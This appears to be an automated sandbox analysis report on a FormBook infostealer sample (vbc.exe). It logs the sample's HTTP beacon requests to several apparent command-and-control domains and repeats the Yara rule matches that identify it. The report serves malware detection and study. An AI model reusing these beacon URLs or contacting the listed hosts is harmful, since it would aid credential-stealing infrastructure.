Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Tue, 09 Nov 2021 11:58:02 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "6182ac26-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Tue, 09 Nov 2021 11:58:13 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "6185407c-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000B.00000000.291685186.0000000006870000.00000004.00000001.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown, DNS traffic detected: queries for: www.sharpstead.com
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.sharpstead.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.maikoufarm.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.septemberstockevent200.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.joye.club | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.mmj0115.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.mmj0115.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.miabellavita.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=h33IU5xP+CsHIX0jyOd12cEn3mj+DYpLQqBt2JgN37c56kNOSv5/h9LYm8RBo0LsRlylinxRVA==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.yungbredda.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH HTTP/1.1 | Host: www.mattlambert.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: vbc.exe, 00000000.00000002.263973483.0000000000D39000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: vbc.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_0295E970
